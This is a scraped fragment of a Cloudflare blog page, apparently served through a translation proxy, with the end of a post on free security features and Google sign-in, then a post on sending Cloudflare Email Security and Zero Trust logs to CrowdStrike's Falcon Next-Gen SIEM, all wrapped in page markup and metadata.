src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Sse03ivX432bBV01nfyUx/1ce8ace19aa3e4228735d1ca7bd3528c/Screenshot_2024-09-23_at_16.02.49.png\" alt=\"\" class=\"kg-image\" width=\"1400\" height=\"160\" loading=\"lazy\"/>\n \n </figure><p>With the launch of this capability, Cloudflare now uses its own Cloudflare Workers to provide an abstraction layer for <a href=\"https://openid.net/developers/how-connect-works/\"><u>OIDC</u></a>-compatible identity providers (such as GitHub and Microsoft accounts), which means our users can expect to see more <a href=\"https://www.cloudflare.com/learning/access-management/what-is-an-identity-provider/\"><u>identity provider (IdP)</u></a> connection support coming in the future.</p><p>At this time, only new customers signing up with Google will be able to sign in with their Google account, but we will be implementing this for more of our users going forward, with the ability to link/de-link social login providers, and we will be adding additional social login methods. Enterprise users with an established SSO setup will not be able to use this method at this time, and those with an established SSO setup based on Google Workspace will be forwarded to their SSO flow, as we consider how to streamline the Access and IdP policies that have been set up to lock down your Cloudflare environment.</p><p>If you are new to Cloudflare, and have a Google account, it is easier than ever to start using Cloudflare to protect your websites, build a new service, or try any of the other services that Cloudflare provides.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"a-safer-internet\">A safer Internet</h2>\n <a href=\"#a-safer-internet\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>One of Cloudflare’s goals has always been to democratize cyber security tools, so everyone can provide content and connect to the Internet safely, even without the resources of large enterprise organizations.</p><p>We have decided to provide a large set of new features for free to all Cloudflare users, covering a wide range of security use cases, for web administrators, network administrators, and cyber security enthusiasts.</p><p><a href=\"https://dash.cloudflare.com/\"><u>Log in to your Cloudflare account</u></a> to start taking advantage of these announcements today. We love feedback on our <a href=\"https://community.cloudflare.com/\"><u>community forums</u></a>, and we commit to improving both existing features and new features moving forward.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"watch-on-cloudflare-tv\">Watch on Cloudflare TV</h2>\n <a href=\"#watch-on-cloudflare-tv\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <div style=\"position: relative; padding-top: 56.25%;\">\n <iframe\n src=\"https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/6752c8696de5daabf2c5bdba83fb30b9/iframe?poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2F6752c8696de5daabf2c5bdba83fb30b9%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D0m2s%26height%3D600\"\n loading=\"lazy\"\n style=\"border: none; position: absolute; top: 0; left: 0; height: 100%; width: 100%;\"\n allow=\"accelerometer; gyroscope; autoplay; encrypted-media; picture-in-picture;\"\n allowfullscreen=\"true\"\n ></iframe>\n</div><p></p>"],"published_at":[0,"2024-09-24T14:00+01:00"],"updated_at":[0,"2024-11-22T18:41:47.424Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/63TGtoovZb40m6p78i5d4R/60fa00809d7b909277c56721dfa453ca/image4.png"],"tags":[1,[[0,{"id":[0,"1Cv5JjXzKWKEA10JdYbXu1"],"name":[0,"Birthday Week"],"slug":[0,"birthday-week"]}],[0,{"id":[0,"6Mp7ouACN2rT3YjL1xaXJx"],"name":[0,"Security"],"slug":[0,"security"]}],[0,{"id":[0,"3iAX3DmDBEfSj3TULqvhPD"],"name":[0,"CASB"],"slug":[0,"casb"]}],[0,{"id":[0,"4yBlHkuMJq9VSFd341CkxY"],"name":[0,"DLP"],"slug":[0,"dlp"]}],[0,{"id":[0,"1T8cuJRyo3f60s8eaRdY6Y"],"name":[0,"Data Loss Prevention"],"slug":[0,"data-loss-prevention"]}],[0,{"id":[0,"6hv2Z69PGr0qU411KfQNUE"],"name":[0,"Threat Intelligence"],"slug":[0,"threat-intelligence"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"6stQ7u3dAyBmZithR7rBBD"],"name":[0,"Page Shield"],"slug":[0,"page-shield"]}],[0,{"id":[0,"1oreuc8ahaGdJNbxhdwSrH"],"name":[0,"Leaked Credential Checks"],"slug":[0,"leaked-credential-checks"]}],[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Michael Tremante"],"slug":[0,"michael-tremante"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/61VxyepuDMgPc2YC1SLjzq/b40290be32d4c578dab2eb8ec1a3b6da/michael-tremante.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,"@MichaelTremante"],"facebook":[0,null]}],[0,{"name":[0,"Reid Tatoris"],"slug":[0,"reid"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/66Vj67NlvjyTARmLiIWx62/c521fade26000bd9480cb3c6384bf757/reid.jpeg"],"location":[0,null],"website":[0,null],"twitter":[0,"@reidtatoris"],"facebook":[0,null]}]]],"meta_description":[0,"Today, we are taking some big steps forward in our mission to help build a better Internet. Cloudflare is giving everyone free access to 10+ different website and network security products and features."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections Loc"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"Translated for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/a-safer-internet-with-cloudflare"],"metadata":[0,{"title":[0,"A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections"],"description":[0,"Today, we are taking some big steps forward in our mission to help build a better Internet. Cloudflare is giving everyone free access to 10+ different website and network security products and features."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/XnNxePLKdNSOFCHnO9vQ9/04ea52daec4bcdcd7366c7b8754b43bb/A_safer_Internet_with_Cloudflare-_free_threat_intelligence__analytics__and_new_threat_detections-OG.png"]}]}],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"PostCard","value":true}" await-children> <article class="w-50-l mt4 mt2-l mb4 ph3 bb b--gray8 bn-l"> <div class="w-100"> <a href="https://blog-cloudflare-com.translate.goog/a-safer-internet-with-cloudflare/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 no-underline gray1" data-testid="post-title"><h2 class="fw5 mt2">A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections</h2></a> <p class="f3 fw5 gray5 my" data-testid="post-date">2024-09-24</p> <div class=""> <a href="https://blog-cloudflare-com.translate.goog/tag/birthday-week/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Birthday Week</a><a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Security</a><a href="https://blog-cloudflare-com.translate.goog/tag/casb/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">CASB</a><a href="https://blog-cloudflare-com.translate.goog/tag/dlp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">DLP</a><a href="https://blog-cloudflare-com.translate.goog/tag/data-loss-prevention/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Data Loss Prevention</a><a href="https://blog-cloudflare-com.translate.goog/tag/threat-intelligence/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Threat Intelligence</a><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Zero Trust</a><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Cloudflare One</a><a href="https://blog-cloudflare-com.translate.goog/tag/page-shield/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Page Shield</a><a href="https://blog-cloudflare-com.translate.goog/tag/leaked-credential-checks/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">Leaked Credential Checks</a><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="dib pl2 pr2 pt1 pb1 mb2 bg-gray8 no-underline blue3 f2 mr1" data-testid="post-tag">SASE</a> </div> <p class="f3 fw4 gray1 lh-copy " data-testid="post-content">Today, we are taking some big steps forward in our mission to help build a better Internet. Cloudflare is giving everyone free access to 10+ different website and network security products and features.<!-- -->...</p> <ul class="author-lists flex pl0"> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/michael-tremante/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/61VxyepuDMgPc2YC1SLjzq/b40290be32d4c578dab2eb8ec1a3b6da/michael-tremante.jpg" alt="Michael Tremante" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/michael-tremante/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Michael Tremante</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/reid/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/66Vj67NlvjyTARmLiIWx62/c521fade26000bd9480cb3c6384bf757/reid.jpeg" alt="Reid Tatoris" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/reid/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw4 f3 no-underline black">Reid Tatoris</a> </div></li> </ul> </div> </article><!--astro:end--> </astro-island> <astro-island uid="2lBjMl" prefix="r5" component-url="/_astro/MorePosts.DyRVOquy.js" component-export="default" renderer-url="/_astro/client.DLO1yDVm.js" props="{"locale":[0,"en-us"],"posts":[1,[[0,{"id":[0,"2oxT0UhMM8loVoSuUom7W8"],"title":[0,"Customers get increased integration with Cloudflare Email Security and Zero Trust through expanded partnership with CrowdStrike"],"slug":[0,"customers-get-increased-integration-with-cloudflare-email-security-and-zero-trust"],"excerpt":[0,"This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats."],"featured":[0,false],"html":[0,"<p>Today, we’re excited to expand <a href=\"https://blog.cloudflare.com/unified-risk-posture\"><u>our recent Unified Risk Posture announcement</u></a> with more information on our latest integrations with <a href=\"https://www.crowdstrike.com/\"><u>CrowdStrike</u></a>. We <a href=\"https://blog.cloudflare.com/unified-risk-posture\"><u>previously shared</u></a> that our CrowdStrike Falcon Next-Gen SIEM integration allows for deeper analysis and further investigations by unifying first- and third-party data, native threat intelligence, AI, and workflow automation to allow your security teams to focus on work that matters.</p><p>This post explains how Falcon Next-Gen SIEM allows customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats. By combining Cloudflare and CrowdStrike, organizations are better equipped to manage risk and decisively take action to stop cyberattacks.</p><p>By leveraging the combined capabilities of Cloudflare and CrowdStrike, organizations combine Cloudflare’s email security and zero trust logging capabilities with CrowdStrike’s dashboards and custom workflows to get better visibility into their environments and remediate potential threats. <a href=\"https://www.happycog.com/\">Happy Cog</a>, a full-service digital agency, currently leverages the integration. Co-Founder and President Matthew Weinberg said: </p><blockquote><p>&#39;The integration of Cloudflare’s robust Zero Trust capabilities with CrowdStrike Falcon Next-Gen SIEM enables organizations to gain a more comprehensive view of the threat landscape and take action to mitigate both internal and external risks posed by today’s security challenges.&#39;</p></blockquote>\n <div class=\"flex anchor relative\">\n <h3 id=\"cloudflare-email-security-with-falcon-next-gen-siem\">Cloudflare Email Security with Falcon Next-Gen SIEM</h3>\n <a href=\"#cloudflare-email-security-with-falcon-next-gen-siem\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>With <a href=\"https://developers.cloudflare.com/email-security/\"><u>Cloudflare Email Security’s</u></a> configurable policies, organizations can now push indicators of compromise (IoC) alerts to Falcon Next-Gen SIEM, notifying analysts about suspicious activity, such as a user engaging with a phishing email. By proactively alerting analysts when suspicious activity is detected, Cloudflare and CrowdStrike can provide early detection of account compromises or insider threats.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"cloudflare-zero-trust-logs-with-falcon-next-gen-siem\">Cloudflare Zero Trust Logs with Falcon Next-Gen SIEM</h3>\n <a href=\"#cloudflare-zero-trust-logs-with-falcon-next-gen-siem\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We are also integrating <a href=\"https://developers.cloudflare.com/cloudflare-one/\"><u>Cloudflare’s Zero Trust</u></a> platform with Falcon Next-Gen SIEM. This allows our mutual customers to push Cloudflare Zero Trust logs from Cloudflare Access and Cloudflare Gateway to Falcon Next-Gen SIEM for better visualization, analysis, and remediation. This integration allows Cloudflare logs to be used to customize and enhance Falcon Next-Gen SIEM detections and trigger CrowdStrike workflows to automatically configure a response action. An example workflow: based on a new detection of a user’s access request being deemed fraudulent, or if a user is engaging with risky websites, the Falcon platform can trigger Cloudflare to move users to affected user groups and apply adaptive access control policies, such as access isolating or quarantining the user.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"how-to-get-started\">How To Get Started</h3>\n <a href=\"#how-to-get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To connect Cloudflare Zero Trust logs, start with the Falcon Next-Gen SIEM module. Navigate to the Data Connectors tab of your Falcon Next-Gen SIEM dashboard and select the Cloudflare Data Connector.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68WBQjl9Y4v8FFZQ8GD7gd/9e2bfa370303f1a3ccfe7a858089b195/image3.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"818\" loading=\"lazy\"/>\n </figure><p>Give the connector a name and select “Save”, and you will receive two pieces of information: an API key and an API URL. Be sure to make note of the key, as it will only be shown once.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6VqTqVgB9mf3CHeYomnfkP/6ae503472ca78969f2a8e26201b5b276/image1.png\" alt=\"\" class=\"kg-image\" width=\"1698\" height=\"636\" loading=\"lazy\"/>\n </figure><p>Next, in Cloudflare, create an <a href=\"https://developers.cloudflare.com/logs/get-started/enable-destinations/http/\"><u>HTTP logpush job via API</u></a>, and format the &quot;destination_conf&quot; field as follows:</p><p><code>&quot;destination_conf&quot;: &quot;&lt;API URL&gt;?header_Authorization=Bearer%20&lt;API KEY&gt;&amp;tags=&lt;ZONE&gt;,dataset:&lt;DATASET&gt;&quot;</code></p><p>Note: </p><ul><li><p>&lt;ZONE&gt; is optional for account-level logpush jobs </p></li><li><p>&lt;DATASET&gt; follows a dot delimited syntax, so <code>http_requests</code> becomes <code>http.requests</code></p></li></ul>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6hWaxWcelja9tY4q6ZSRwT/659bd80980cba2b5988279209fe6fdff/image2.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"716\" loading=\"lazy\"/>\n </figure><p>Once the job is created and active, you will start to see events populating in the My Connectors section of your Falcon dashboard. Once Cloudflare data is populated in Falcon Next-Gen SIEM, you can now search events and create Falcon Fusion SOAR automation workflows and correlation rules, all based on Cloudflare log events.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7g7PFWfKkHyT8gtKjROCbB/7a09065ff88e2cae7b905b8cc30f6442/image5.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"898\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"in-summary\">In Summary</h3>\n <a href=\"#in-summary\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Together, CrowdStrike and Cloudflare’s shared telemetry will further decrease the mean time to containment and expedite any organization’s ability to decisively respond to risks within their environment. The two platforms work together as one, allowing organizations to block suspicious activity and deliver high-fidelity alerts to security analysts for further investigation.</p><p>To learn more about these integrations, feel free to <a href=\"https://www.cloudflare.com/zero-trust/trial/\"><u>reach out to us</u></a> to get started with a consultation. We can discuss your existing environment and ensure that you are best equipped to achieve better visibility and remediation in the face of emerging threats.</p>"],"published_at":[0,"2024-09-11T14:00+01:00"],"updated_at":[0,"2024-10-10T14:27:31.829Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QchhuiBpH2stv3DfpsRFe/d7f214617dcef103ddbb3feb9efeac95/image4.png"],"tags":[1,[[0,{"id":[0,"V86khSc459Yi1AhTlvtY7"],"name":[0,"Partners"],"slug":[0,"partners"]}],[0,{"id":[0,"1RLvuKAYbpdL7SbAtcJgQ0"],"name":[0,"CrowdStrike"],"slug":[0,"crowdstrike"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Corey 